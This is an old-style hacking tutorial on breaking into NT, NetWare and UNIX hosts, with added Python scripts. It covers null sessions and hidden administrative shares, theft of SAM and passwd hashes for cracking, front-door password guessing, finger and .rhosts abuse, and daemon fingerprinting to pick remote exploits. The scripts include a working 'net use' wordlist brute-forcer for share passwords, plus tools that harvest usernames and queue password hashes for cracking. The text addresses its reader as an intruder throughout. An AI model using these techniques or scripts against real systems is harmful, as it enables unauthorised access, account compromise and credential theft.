NT

Until recently, UNIX machines made up the vast majority of machines on the Internet.  Windows NT has eaten into that share; now somewhere between 10% and 15% of the machines you'll find on the Net are NT boxes.  NT ships with, or can run, almost as many services as UNIX, with a few differences.  You generally won't find as many open ports on a Windows box, simply because far fewer network daemons are installed by default (Windows does have a full sockets interface, Winsock; a socket is one end of a two-way connection between two programs over some protocol).  NT Server ships with an FTP server as part of IIS.  Finger servers can be bought for NT.  SMTP and POP (Post Office Protocol) servers come with Microsoft Exchange, which is pretty commonplace.  One port that will give your target away as a Windows box is an open port 139.  This is the NetBIOS session service port, or 'nbsession' according to some portscanners.  UNIX machines speak TCP/IP natively (making them ideal machines for the Internet), whereas Windows file and printer sharing is built on NetBIOS.  NetBIOS itself is only a naming and session layer; it needs a transport underneath it.  On a LAN that transport is often NetBEUI (NetBIOS Extended User Interface), which is not routable and so never crosses the Internet.  To reach an NT server over the Net, NetBIOS has to be carried over TCP/IP (NBT), and that is exactly what port 139 is.  To connect to an NT machine this way, you use the Microsoft networking client.  Using it to connect to port 139 on a Windows machine is the NT counterpart of telnetting to port 23 on a UNIX machine.  If you have Windows 95 / 98 / NT, you have the client, though it might not be installed.  To check, go to Control Panel, then Network.  You should see a list of the protocols and clients installed on your machine.  You need TCP/IP (with NetBIOS over TCP/IP enabled, which it normally is by default) and Client for Microsoft Networks.  NetBEUI is not needed for targets on the Internet; it only matters for machines on your own LAN segment.  If anything is missing, click 'Add' and add the appropriate client or protocol (you'll probably need your Windows disks).  To use the client from the command line, open a DOS box.  The command you will be using is 'net'.

Type 'net' to see a list of net commands.  Some of these cannot be issued from a DOS window.  The two you as a hacker should be concerned with are 'net view' and 'net use'.  If you come across a machine with an open port 139, there is a chance that it has shares on it.  A Windows share is a directory somewhere on the server (be it Windows 95, 98, or NT) that is set up to be accessed by others on the network.  Sometimes shares are password protected, sometimes not (on 95/98 a share can carry a plain share-level password; on NT access is granted per user account).  Once connected to a share, you can use regular DOS commands (cd, mkdir, edit, etc.) to move about and manipulate files within it.  To list the shares an NT box offers over NetBIOS, at a DOS prompt type:

net view \\[ip address]

Again, this only works if you have TCP/IP (with NetBIOS over TCP/IP) and Client for Microsoft Networks installed on your computer.  If there are any visible shares, they will be listed by name after you issue this command (hidden shares, covered below, are never listed).  So let's say you net view some.server.net and are told that there is a share called 'users'.  To connect to it, type:

net use [d]: \\[ip address]\[sharename]       

or in this case...

net use w: \\some.server.net\users

where w: is the drive letter you are mapping the share to.  If you get 'The command completed successfully' then you are connected to the share.  Change drives to w: (or whatever drive letter you picked) and hit 'dir'.  Now, let's say that the share 'users' was 'C:\network\users' on the NT box.  Your drive w: is now C:\network\users, and you can't go any higher up the filesystem than that: the share is the top of the tree you see.  Unlike UNIX, there is no ls -l to tell you from the client side what rights you have on a share (on NT itself, cacls will show the NTFS permissions if you are allowed to read them), so you'll just have to try it out.  Create and erase a file.  Make and delete a directory.  You may have read-only access, or you may have read and write (read files and modify them), or change access that also lets you delete.  If you see a file you want a copy of, copy it to your own disk:

copy w:\fileIwant.txt C:\mybox\fileIwant.txt

And it will copy over to your machine ('type fileIwant.txt > C:\mybox\fileIwant.txt' also works, but only for text files; copy handles binaries).  If ever you come across a passworded share, you have a few options on how to get past the protection.  If you can get hold of the password hashes (explained later), crack them with L0phtCrack.  Or, you could write a batch file that runs net use against the share over and over, feeding it one password at a time from a wordlist (available all over).  If you aren't skilled at writing batch files, get yourself a good DOS book, and at least find out about commands and DOS environment variables.  You could make yourself quite a powerful brute force share-cracker batch file in under 20 lines.  I personally use VB for brute force engine making.  Be aware that an NT administrator can set an account lockout policy, so hammering a user account with guesses may lock it out and leave a trail in the security log.  Also, if you want to quickly search an entire (or even multiple) subnet(s) for open shares, use a sharescanner such as Legion.
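Here is the logic of that brute-force batch file written out in Python, as an added example that is not part of the original tutorial.  It wraps the net use command described above and takes the command runner as a parameter, so it can be exercised offline with the built-in fake runner; the target name, share name and wordlist are made up for illustration.

```python
"""Wordlist attack on a password-protected Windows share, driven through 'net use'.

Added example, not part of the original tutorial.  For each candidate
password it runs 'net use W: \\\\target\\share <password>' and stops at the
first one Windows accepts.  The command runner is a parameter, so the logic
can be run offline with fake_runner_for(); real_runner shells out on a
Windows box.  Target, share and wordlist are constructed for illustration.
"""
import subprocess
from typing import Callable, Iterable, List, Optional

# Constructed wordlist; a real run would read a file with thousands of entries.
SAMPLE_WORDLIST = ["password", "letmein", "users", "secret"]

Runner = Callable[[List[str]], int]


def build_net_use(drive: str, target: str, share: str, password: str) -> List[str]:
    """Argument vector for 'net use', e.g. net use W: \\\\host\\users <password>."""
    return ["net", "use", drive.rstrip(":") + ":", "\\\\%s\\%s" % (target, share), password]


def build_net_delete(drive: str) -> List[str]:
    """Argument vector that unmaps the drive again so nothing is left mapped behind."""
    return ["net", "use", drive.rstrip(":") + ":", "/delete", "/y"]


def real_runner(argv: List[str]) -> int:
    """Run the command on a Windows host; net.exe exits 0 on success, non-zero otherwise."""
    return subprocess.run(argv, capture_output=True).returncode


def fake_runner_for(correct_password: str) -> Runner:
    """Offline stand-in for net.exe: succeeds only when the last argument is the right password."""
    def runner(argv: List[str]) -> int:
        return 0 if argv[-1] == correct_password else 2
    return runner


def brute_force_share(target: str, share: str, wordlist: Iterable[str],
                      runner: Runner = real_runner, drive: str = "W:",
                      max_attempts: Optional[int] = None) -> Optional[str]:
    """Return the first password 'net use' accepts for \\\\target\\share, or None.

    max_attempts caps the run: NT can be configured to lock an account after a
    handful of bad passwords, so a blind pass over a large wordlist may just
    lock you out and leave a trail in the security log.
    """
    for attempt, password in enumerate(wordlist, start=1):
        if max_attempts is not None and attempt > max_attempts:
            return None
        if runner(build_net_use(drive, target, share, password)) == 0:
            runner(build_net_delete(drive))   # success: unmap so the drive letter is free again
            return password
    return None


if __name__ == "__main__":
    # Offline demonstration against the fake runner; use runner=real_runner on a Windows box.
    print(brute_force_share("some.server.net", "users", SAMPLE_WORDLIST,
                            runner=fake_runner_for("secret")))
```

On a Windows box, pass runner=real_runner and a real wordlist; the fake runner exists only so the control flow (stop on first hit, unmap afterwards, honour max_attempts) can be checked without a target.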

One last thing on shares - administrators often hide certain shares.  A hidden share won't show up in a net view, but if you connect to it by name with net use you will get in, provided the account you are using has rights to it.  NT also creates a set of hidden administrative shares by default:

ADMIN$ (the %SystemRoot% directory - remote administration - can you say root shell?)

C$ (the root of each fixed disk; there is a D$, E$ and so on for every drive)

IPC$ (the inter-process communication share - no files in it, but it is what remote administration tools, and the 'null session' net use \\server\IPC$ "" /user:"", connect to - these are really fun...)

The administrative shares admit only members of the Administrators group.  The dollar sign at the end is what makes a share hidden.  You must include it in your net use command.  (SMB$ and SMBSERVER$, which you may see listed as hidden shares elsewhere, are not NT shares at all: *SMBSERVER is the generic NetBIOS name a Samba server on UNIX answers to.)  One last note on NT hacking.  WINS (Windows Internet Name Service) translates NetBIOS computer names (NetBIOS addresses machines by name, not by IP address) to IP addresses, much as DNS does for host names.  The nbtstat command shows you a machine's NetBIOS name table.  Furthermore, the LMHOSTS file on any Windows machine (lmhosts.sam is the sample that ships with it; copy it to lmhosts with no extension, in the Windows directory on 95/98 or in %SystemRoot%\system32\drivers\etc on NT) acts as a mini WINS table when WINS itself is not available (TCP/IP properties under Control Panel/Network).  What does this mean to you as a hacker?  Let's say the NT computer you are trying to break into is 200.23.54.1.  Do an nbtstat -A 200.23.54.1 to get its NetBIOS over TCP/IP name table.  Of importance is any UNIQUE entry with a <20> suffix - that is the Server service, meaning the computer is sharing (and that you can connect via the net command, or by the technique I'm about to explain).  A UNIQUE <00> entry is the computer's name; a GROUP <00> entry is its domain or workgroup.  So to reach the computer by name, add it to your LMHOSTS file.  The entry would look something like:

200.23.54.1 compname #PRE

Then purge and reload your NetBIOS name cache (which pulls in the #PRE entries from LMHOSTS) by issuing: nbtstat -R

Your computer now knows how to reach that machine by its NetBIOS name directly.  Go to Find on your Start menu, then Computer, and type in the computer name.  If you did everything correctly and your network configuration is right (see above for instructions), that computer will pop up.  To connect, just double-click it.  I suggest copying a shortcut to your desktop, or your Network Neighborhood.
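As an added example (not from the original tutorial), here is a small parser for nbtstat -A output that picks out the <00> and <20> entries discussed above and writes the LMHOSTS line for you.  The sample output is constructed to look like what NT 4 prints; the computer name FILESRV, workgroup SALES and user JSMITH are invented.

```python
"""Parse 'nbtstat -A <ip>' output into the facts that matter.

Added example, not from the original tutorial.  SAMPLE_NBTSTAT is
constructed to look like NT 4's output.  Suffix meanings are the standard
NetBIOS ones: UNIQUE <00> = computer name, GROUP <00> = domain/workgroup,
UNIQUE <20> = Server (file sharing) service, UNIQUE <03> = Messenger
service, registered for both the computer and each logged-on user.
"""
import re
from typing import Dict, List, NamedTuple, Optional

SAMPLE_NBTSTAT = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
FILESRV        <00>  UNIQUE      Registered
FILESRV        <20>  UNIQUE      Registered
SALES          <00>  GROUP       Registered
SALES          <1E>  GROUP       Registered
JSMITH         <03>  UNIQUE      Registered
FILESRV        <03>  UNIQUE      Registered

MAC Address = 00-50-56-C0-00-08
"""

# One table row: name, <suffix>, UNIQUE/GROUP, status.  Header and MAC lines don't match.
ENTRY_RE = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)", re.M)


class NbtEntry(NamedTuple):
    name: str
    suffix: str   # two hex digits, e.g. "20"
    kind: str     # "UNIQUE" or "GROUP"


def parse_nbtstat(text: str) -> List[NbtEntry]:
    """Return every registered name in the remote machine's name table."""
    return [NbtEntry(name, suffix.upper(), kind)
            for name, suffix, kind, status in ENTRY_RE.findall(text)
            if status.lower() == "registered"]


def summarize(entries: List[NbtEntry]) -> Dict[str, object]:
    """Computer name, domain/workgroup, whether it shares files, and who is logged on."""
    computer = next((e.name for e in entries if e.suffix == "00" and e.kind == "UNIQUE"), None)
    domain = next((e.name for e in entries if e.suffix == "00" and e.kind == "GROUP"), None)
    users = sorted({e.name for e in entries
                    if e.suffix == "03" and e.kind == "UNIQUE" and e.name != computer})
    return {
        "computer": computer,
        "domain": domain,
        "file_sharing": any(e.suffix == "20" and e.kind == "UNIQUE" for e in entries),
        "logged_on_users": users,
    }


def lmhosts_line(ip: str, entries: List[NbtEntry]) -> Optional[str]:
    """LMHOSTS entry pinning the computer name to its IP, preloaded into the cache (#PRE)."""
    name = summarize(entries)["computer"]
    return "%s %s #PRE" % (ip, name) if name else None


if __name__ == "__main__":
    table = parse_nbtstat(SAMPLE_NBTSTAT)
    print(summarize(table))
    print(lmhosts_line("200.23.54.1", table))
```

The <03> entries are a bonus the text does not mention: the Messenger service registers the name of whoever is logged on at the console, which hands you a valid username for the front door.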

 

Novell Netware

Unix machines still account for most machines on the Net.  NT is catching up, and between the POSIX and Microsoft platforms you won't find much else on the Internet.  Once in a great while, however, you just might run into a completely different operating system.  Novell NetWare used to be the biggest client/server network operating system around, and rivals NT to this day.  So just in case you run into one of these foreign systems, here is a little info on Novell NetWare.

NetWare has been around for quite some time - the first version was command-line and sat on top of DOS.  Now GUI (Graphical User Interface) clients exist for it, and version 4.5 has been released.  Like Windows NT, computing is not centralized (as it is on a Unix timesharing host); resources are distributed among the network.  One computer may be a print server, one might be a mail server, another a file server.  The thing that makes NetWare unique is the NDS database, or Novell Directory Services.  NDS is comparable to the accounts database an NT primary domain controller (PDC) keeps, except that it describes far more than accounts.  It is a hierarchical representation of the entire network.  At the root of the NDS tree is the object '[Root],' similar to a root directory.  Stemming from the root are one or more organization objects, with organizational units beneath them, comparable to subdirectories.  Inside these container objects can be more organizational units, or what are known as 'leaf' objects, comparable to files.  These leaf objects are what make up the conceptual network.  Leaves include user objects, representing users of the network, server objects, representing servers, volume objects, representing a server's disk volumes, and so on.  The container objects exist for no other reason than to organize the network conceptually.  The whole idea of NDS is sometimes hard to grasp at first, since it is so abstract, but it greatly eases administration.

When you refer to a specific file on a hard disk, you refer to its path.  When you refer to an NDS object's location, you refer to its context.  Paths start with root at the left, such as:

C:\Winnt\programs\file.ini

Contexts, on the other hand, start with the root at the right, such as:

.user22.market.UAS

where user22 is the object we are referring to.  We don't need to specify [Root] because it is assumed that the root always follows the last container listed.  The context above specifies the user22 object, which is in the organizational unit 'market,' which resides in the organization 'UAS.'  When referring to objects absolutely (full context), you must start the context with a period (.), and separate each entry with a period as well.  Now if your current working context were .market.UAS (same concept as a current working directory), you could refer to user22 relatively (just as in Unix or DOS filesystems) with simply:

user22

with no period. 
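The naming rules above, as an added example in Python (not part of the original tutorial).  It resolves a relative name against a current context, honours the NDS rule that each trailing period on a relative name climbs one container before the name is appended, and also produces the typeful form (CN=, OU=, O=) that NDS tools accept.  It assumes the common layout of one Organization at the top and Organizational Units below it; the names user22, market, UAS and fs1 are the tutorial's illustrative ones plus one invented server.

```python
"""NDS context handling: absolute vs relative names and typeful equivalents.

Added example, not from the original tutorial.  Rules implemented:
  - a name beginning with a period is absolute (complete context);
  - otherwise the name is relative to the current context;
  - each trailing period on a relative name drops one container from the
    left of the current context before the name is appended (NDS rule).
typeful() assumes the tree is [Root] -> Organization (O) -> Organizational
Units (OU) -> leaf object (CN); that is the usual layout, not the only one.
"""
from typing import List


def split_context(ctx: str) -> List[str]:
    """'.user22.market.UAS' -> ['user22', 'market', 'UAS'] (leaf first, root last)."""
    return [part for part in ctx.strip(".").split(".") if part]


def resolve(name: str, current_context: str) -> str:
    """Full (absolute, leading-period) context of name as seen from current_context."""
    if name.startswith("."):
        return name                        # already absolute
    stripped = name.rstrip(".")
    climb = len(name) - len(stripped)      # trailing periods: containers to move up
    base = split_context(current_context)[climb:]
    return "." + ".".join(split_context(stripped) + base)


def typeful(ctx: str) -> str:
    """'.user22.market.UAS' -> 'CN=user22.OU=market.O=UAS'."""
    parts = split_context(ctx)
    if len(parts) < 2:
        raise ValueError("need at least a leaf object and an organization")
    types = ["CN"] + ["OU"] * (len(parts) - 2) + ["O"]
    return ".".join("%s=%s" % (t, p) for t, p in zip(types, parts))


if __name__ == "__main__":
    print(resolve("user22", ".market.UAS"))     # .user22.market.UAS
    print(resolve("fs1.", ".market.UAS"))       # climbs out of market: .fs1.UAS
    print(typeful(".user22.market.UAS"))        # CN=user22.OU=market.O=UAS
```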

Now, NetWare networks are usually administered through GUI tools.  If you ever connect to a Novell server over the Net, though, you will be working at a command line.  You map network drives to NetWare volumes (the NetWare counterpart of a Windows share) with the MAP command, much as you would net use to an NT machine, and you change your context and navigate the NDS with the CX command.  In order to do this, you will need to get your hands on a NetWare client.  You can get a free client at www.novell.com.

Now a user leaf object on the NDS tree represents each user in a Novell network.  So to log in as user22, whose object is in the market.UAS container, you have to log in as:

.user22.market.UAS

Mapping drives to NetWare volumes is done in one of two ways.  You can either name the server you are connecting to physically, as server/volume:

MAP X:=servername/volumename:

or name the volume's NDS object (by default called servername_volumename) by its context, such as

MAP X:=.servername_volumename.organization:

When trying to break into a Novell server on the Net with, say, an IP address of 212.14.6.2, you would issue this command (with a NetWare client, in a DOS box), assuming the client can reach the server's NCP service over IP (NetWare 5 speaks IP natively; earlier versions use IPX, which is not routed across the Internet unless the NetWare/IP add-on is in use):

MAP X:=212.14.6.2/volumename:

It is beyond the scope of this text to get into great detail about all the commands and inner workings of Netware, so feel free to jump into a Netware book.  Really. 

 

"Unbelievable - a Hacker!"

The object of your hack will most likely be to obtain root, i.e. total control over the machine (and, through it, possibly the network).  With a root shell (any shell running with root privileges, the superuser account) you can read, write, and execute everything on that computer.  To obtain root, you'll probably have to break in with some other account first.  From there you can run a local exploit, download the password file, or whatever.

Sploits

A local sploit (exploit) is a program that abuses a security bug in the operating system or in a privileged program (one that runs setuid root, say) to raise your access level, often all the way to root.  There are many exploits out there, for many different network operating systems.  One of the most common bug classes is the buffer overflow (in its classic form, a stack-based buffer overflow).  A program copies input into a fixed-size buffer on the stack without checking the length; if you feed it more than the buffer holds, the excess overwrites whatever sits beyond the buffer, including the saved return address of the current function.  When that function returns, the processor jumps to whatever address you overwrote it with, typically back into your own input, where you have placed machine code (shellcode) that starts a shell.  Since the vulnerable program was running as root, so does the shell.  To use any exploit, of course, you need an account you can log into: FTP in to upload the exploit from your computer to the server, then telnet in to compile and run it (it has to be built for the target's OS and CPU).  Exploits are OS and version specific, and it's sometimes hard to find one for a specific system (though they are available all over the Internet).  If this is the case, you'll have to resort to more traditional methods of getting root.  Like cracking the password file.

The Password File

In the /etc directory (UNIX) is a file called passwd, which lists every user on the system along with some other information, and traditionally held every user's password.  Unfortunately for you, the passwords are not stored in the clear: each is run through the one-way crypt(3) function and only the resulting hash is kept.  A hash cannot be decrypted, so you have to guess.  Download the password file and crack it on your own computer with a password cracker such as John the Ripper, which hashes words from a wordlist and compares the results against the entries.  Another security measure system administrators use to keep hackers out is password shadowing.  If shadowing is in use (and it often is), all the hashes in passwd are replaced with *'s or x's.  These placeholders are not crackable; there is nothing in them to crack.  The real password hashes are in a second file that only root can read, such as /etc/shadow (Linux, Solaris) or /etc/master.passwd (BSD).  Look around.  To give you an idea of what to look for, here is a password file with hashes in it:

                root:2fkbNba29uWys:0:1:Operator:/:/bin/csh

                admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh

                kangaroo:3A62i9qr:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh

Here is a shadowed password file:

                root:*:0:1:Operator:/:/bin/csh

                admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh

                kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh

At any rate, when you crack these, depending on the hash algorithm in use and the quality of the passwords chosen, you should get a handful of valid usernames and passwords.  If you didn't get the root password, an account that is allowed to su to root (on BSD systems, one in the wheel group) or an administrative account (such as admin or sysop) is the next best thing.  One note about root: a lot of systems are set up so that root cannot log in remotely (from outside).  This means you'll have to log in as someone else, then use the 'su' command and enter the root password (su lets you take on another user's identity, root by default, and stands for 'substitute user.')
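An added example (not from the original tutorial) that triages a passwd file the way you would before feeding it to John: it parses the seven colon-separated fields, tells real crypt(3) hashes from shadow placeholders and empty passwords, and lists the uid 0 accounts.  The sample is the file shown above with the kangaroo line completed from its shadowed copy; the shadowed sample adds a constructed 'guest' account with no password at all.

```python
"""Triage a UNIX passwd file: which entries carry a real hash, which are shadowed.

Added example, not from the original tutorial.  The classic crypt(3) hash is
13 characters of [A-Za-z0-9./]; '*', 'x' or a leading '!' means the hash
lives in the shadow file or the account is locked; an empty field means no
password is needed at all.  SAMPLE_PASSWD is the tutorial's sample file;
SAMPLE_SHADOWED is its shadowed form plus a constructed 'guest' entry.
"""
import re
from typing import Dict, List, NamedTuple

SAMPLE_PASSWD = """\
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
"""

SAMPLE_SHADOWED = """\
root:*:0:1:Operator:/:/bin/csh
admin:x:100:11:WWW administrator:/home/Common/WWW:/bin/csh
guest::2000:20:Guest:/tmp:/bin/sh
"""

DES_CRYPT_RE = re.compile(r"^[A-Za-z0-9./]{13}$")


class PwEntry(NamedTuple):
    user: str
    field: str      # the password field as found in the file
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PwEntry]:
    """Split each non-comment line into its seven fields; reject anything malformed."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            raise ValueError("malformed passwd line: %r" % line)
        user, field, uid, gid, gecos, home, shell = parts
        entries.append(PwEntry(user, field, int(uid), int(gid), gecos, home, shell))
    return entries


def classify(field: str) -> str:
    """'hash' (crackable), 'shadowed', 'empty' (no password) or 'odd' (not a crypt(3) string)."""
    if field == "":
        return "empty"
    if field in ("*", "x") or field.startswith("!"):
        return "shadowed"
    if DES_CRYPT_RE.match(field):
        return "hash"
    return "odd"


def triage(text: str) -> Dict[str, List[str]]:
    """Bucket users by what their password field tells you, plus every uid 0 account."""
    out: Dict[str, List[str]] = {"hash": [], "shadowed": [], "empty": [], "odd": [], "uid0": []}
    for e in parse_passwd(text):
        out[classify(e.field)].append(e.user)
        if e.uid == 0:
            out["uid0"].append(e.user)
    return out


def crackable_lines(text: str) -> List[str]:
    """Only the entries worth feeding to a cracker, in user:hash form."""
    return ["%s:%s" % (e.user, e.field) for e in parse_passwd(text)
            if classify(e.field) == "hash"]


if __name__ == "__main__":
    print(triage(SAMPLE_PASSWD))
    print(triage(SAMPLE_SHADOWED))
    print(crackable_lines(SAMPLE_PASSWD))
```

Note what it says about the tutorial's own sample: the kangaroo entry's 8-character field is not a valid crypt(3) hash, so it lands in the 'odd' bucket rather than the cracking queue.  An empty field, as on the constructed guest line, is the jackpot: no cracking needed.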

NT passwords are a little different.  The hashes are kept in the registry rather than in a plain file like Unix, which makes them harder to get your hands on, and there are two hashes per account: the weak LAN Manager hash and the stronger NT hash.  There are a few ways to get them.  Since the registry is in use while NT runs, you can dump the hashes straight out of it, but only from an account with Administrator rights on that machine; the SAM is off limits to ordinary users.  You'll need L0phtCrack (or pwdump) to do this, and Windows NT (so now might be a good time to put an NT partition on your hard drive).  If you are physically at the NT box you want to hack and can log on as an administrator, just install L0phtCrack and select the registry dump option.  Otherwise, you have two options for getting the password hashes over the Internet.  If the target runs the Remote Registry service (not common on Internet-facing boxes) and you have NT at home, you can pull the hashes from its registry with L0phtCrack: enter the target's IP address and administrator credentials, and in a few seconds you'll find out whether it lets you in.  If not, you have only one option left.  NT keeps the registry in files called hives, in %SystemRoot%\system32\config; the hive with the passwords in it is SAM.  So why don't you just download it like a UNIX password file?  Because while NT is running the SAM file is held open and locked: nobody, not even Administrator, can read or copy it.  Your only hope is to boot the target into another OS, like Linux or DOS, and take the file from there (NT protects it, DOS and Linux don't care).  This is difficult over the Net.  It is, however, possible.  You'll also need a driver that lets DOS (which understands FAT) or Linux (ext2) read the NTFS partition the SAM lives on, such as NTFSDOS or the Linux NTFS driver.  Once in a while, though, you may come across copies of the hives stored in %SystemRoot%\repair as compressed ._ files (sam._ and friends, written whenever an administrator runs rdisk /s to build an emergency repair disk) or in a directory like 'reg_backup'; the repair directory's permissions are often lax, so check it.  With all the work it takes to get NT passwords, you're usually better off trying some other method of getting in, like exploits.

Infiltration

Again, every open port (port that you found during your portscan) is a door to the insides of that computer.  To find out how each port is a potential point of infiltration for you, you'll need to find out a little more about each protocol.  Do some research.  For now, I've provided a little info on how you can use these protocols against the computer. 

Again, when you log in via the telnet port, it is as if you were sitting at a terminal on that network.  One of the first things you should try is the "front door."  Telnet to the machine and try some commonly used username and password combinations.  Next, try the login part of each of the email addresses you've collected as a username.  A surprising number of people are dumb enough to use their first name or login name as their password (assuming they are allowed to set their own), so try that too.  Chances are this won't work (though it's a good idea to try anyway; keep in mind that failed logins are logged, so don't hammer it), so you can move on to hacking in through the various ports.

Often the FTP service allows anonymous logins (logging in with 'ftp' or 'anonymous' as the username and any password; by convention you give your email address).  When you do so, your home directory will be something like /usr/daemon/ftp or /home/ftp.  However, if you issue pwd (to find out what directory you're in), it will say that you are in / (root).  That is because the server has done a chroot(): as far as your session is concerned the anonymous FTP directory is the root of the filesystem, and you can't climb out of it.  So if after logging in anonymously you cd (change directory) to lib, you will be told that you are in /lib, while you're really in /home/ftp/lib, or wherever.  System admins put a bin and an etc inside the ftp directory (the chrooted ls needs them), and in that etc will be a passwd file - but don't get your hopes up: it is a copy made so ls can map uids to names, and 99% of the time it is shadowed, i.e. contains no hashes.  Anonymous ftp access is really only helpful if you can download useful information (or if the server lets anonymous users write to an incoming directory, which makes a handy drop point).

If you see an open finger port (79), this could be the break you were looking for.  Use a finger client and do a generic query (no username, i.e. finger @domain) to get a list of the users currently logged on.  Most finger daemons match a query against real names as well as login names and will report matching users whether or not they are logged on, so try a few common first names too.  For specific user information, type in username@domain; it will give you the full name, home directory, shell, last login and the user's .plan.  Every login name finger hands you is a username to try at the front door.

If you see a port called 'nbsession' (139) open, you may also be in luck.  This usually means that this particular server is a Windows box (NT, or 95/98 with file sharing turned on), which is much less common than Unix.  Refer to the NT section.

The rlogin port (513) may be another point of infiltration.  rlogin is like telnet, though older and less secure: it takes the client's word for who you are, and if your host and username appear in the target's /etc/hosts.equiv or in a user's ~/.rhosts, you get in with no password at all.  Telnetting to it won't get you far, because rlogind insists that the connection come from a privileged source port, which a telnet client doesn't use; use an rlogin client instead and see what it lets you do.

The Gopher protocol (port 70) was used as a text transfer protocol before the days of HTML, the WWW, and graphics on the web.  If you come across a gopher port, use a browser with a built-in gopher client (newer versions of Navigator and Internet Explorer) and connect to it.  You'd be amazed at what the gopher service will sometimes let you see.

Write down any other ports you see.  Telnet to them all, and see what happens.  If after you telnet in nothing happens, issue commands, hit enter a few times.  Play around - as I said before, 80% of what you will know will come from experience, not texts. 

Remote Sploits

Another way to use the FTP and SMTP ports against the server is with a remote exploit.  Local exploits are those you execute on the server, whereas remote exploits you launch from your own computer against a service that is listening on the network.  Both can be found in the various sploit archives on the Net.  Remote exploits, like local ones, are service and version specific, in that they exploit a bug in the programming of the daemon itself.  If the FTP port is running, say, wu-ftpd 2.4.2, go out and find the exploit for that exact daemon at that exact version.  If the SMTP port is running sendmail 8.8.8, get the sploit for it.  These exploits are usually C code, so you'll need to compile them.  Most assume you have particular header files (*.h), so you may need to find those as well - look at the code to be sure.  To make obtaining the header files and compiling the exploits a heck of a lot easier, you ought to think about putting a Linux partition on your hard drive.  At any rate, most remote exploits, if correctly implemented, give you root access when launched, or at least some access.  To find out what software an FTP port is running, telnet to it: the 220 greeting banner usually names the daemon and version.  The SYST command, by contrast, tells you the operating system type (e.g. '215 UNIX Type: L8'), not the daemon version, and you may have to log in (try anonymous) before the server will answer it.  SMTP servers hide their software and version far less often than FTP servers do; sendmail announces itself, version and all, in its 220 banner.
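An added example (not from the original tutorial) that pulls the daemon name and version out of FTP and SMTP greeting banners and keeps the SYST reply (operating system) separate from the daemon version.  The banners and host names are constructed in the formats wu-ftpd and sendmail print; the table of versions of interest is illustrative only, not a vulnerability database.

```python
"""Fingerprint FTP/SMTP daemons from their greeting banners.

Added example, not from the original tutorial.  The sample banners are
constructed in the formats the daemons use: wu-ftpd puts its version in the
220 greeting, sendmail announces 'ESMTP Sendmail <version>/<config version>'.
SYST answers with the OS type, not the daemon version, so it is parsed
separately.  VERSIONS_OF_INTEREST is illustrative, not a vulnerability list.
"""
import re
from typing import Dict, Optional, Tuple

SAMPLE_FTP_BANNER = ("220 ftp.example.net FTP server "
                     "(Version wu-2.4.2-academ[BETA-18](1) Tue Nov 11 1997) ready.")
SAMPLE_SMTP_BANNER = "220 mail.example.net ESMTP Sendmail 8.8.8/8.8.8; Tue, 3 Mar 1998 10:15:02 -0500"
SAMPLE_SYST_REPLY = "215 UNIX Type: L8"

# (product, regex capturing the version string as the daemon prints it)
BANNER_PATTERNS = [
    ("wu-ftpd", re.compile(r"Version wu-([0-9][\w.\-\[\]()]*)", re.I)),
    ("sendmail", re.compile(r"\bSendmail ([0-9]+(?:\.[0-9]+)+)", re.I)),
    ("proftpd", re.compile(r"ProFTPD ([0-9][\w.]*)", re.I)),
]

# Versions the text names as having exploits floating around.  Illustrative only.
VERSIONS_OF_INTEREST = {("wu-ftpd", "2.4.2"), ("sendmail", "8.8.8")}


def identify(banner: str) -> Optional[Tuple[str, str]]:
    """(product, version) from a 220 greeting, or None if it is not one we recognise."""
    if not banner.startswith("220"):
        return None
    for product, pattern in BANNER_PATTERNS:
        m = pattern.search(banner)
        if m:
            return product, m.group(1)
    return None


def base_version(version: str) -> str:
    """Strip build tags: '2.4.2-academ[BETA-18](1)' -> '2.4.2'."""
    m = re.match(r"[0-9]+(?:\.[0-9]+)*", version)
    return m.group(0) if m else version


def parse_syst(reply: str) -> Optional[str]:
    """Operating system type from a SYST reply ('215 UNIX Type: L8' -> 'UNIX')."""
    m = re.match(r"215\s+(\S+)", reply)
    return m.group(1) if m else None


def assess(banner: str) -> Dict[str, object]:
    """Identify the daemon and say whether its base version is on the list of interest."""
    ident = identify(banner)
    if ident is None:
        return {"product": None, "version": None, "of_interest": False}
    product, version = ident
    return {"product": product, "version": version,
            "of_interest": (product, base_version(version)) in VERSIONS_OF_INTEREST}


if __name__ == "__main__":
    print(assess(SAMPLE_FTP_BANNER))
    print(assess(SAMPLE_SMTP_BANNER))
    print(parse_syst(SAMPLE_SYST_REPLY))
```

Matching on the base version is deliberate: the academ[BETA-18] tag on the wu-ftpd banner is a build label, and an exploit written for 2.4.2 will usually name the build it was tested against, so compare the full string by hand before you fire anything.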
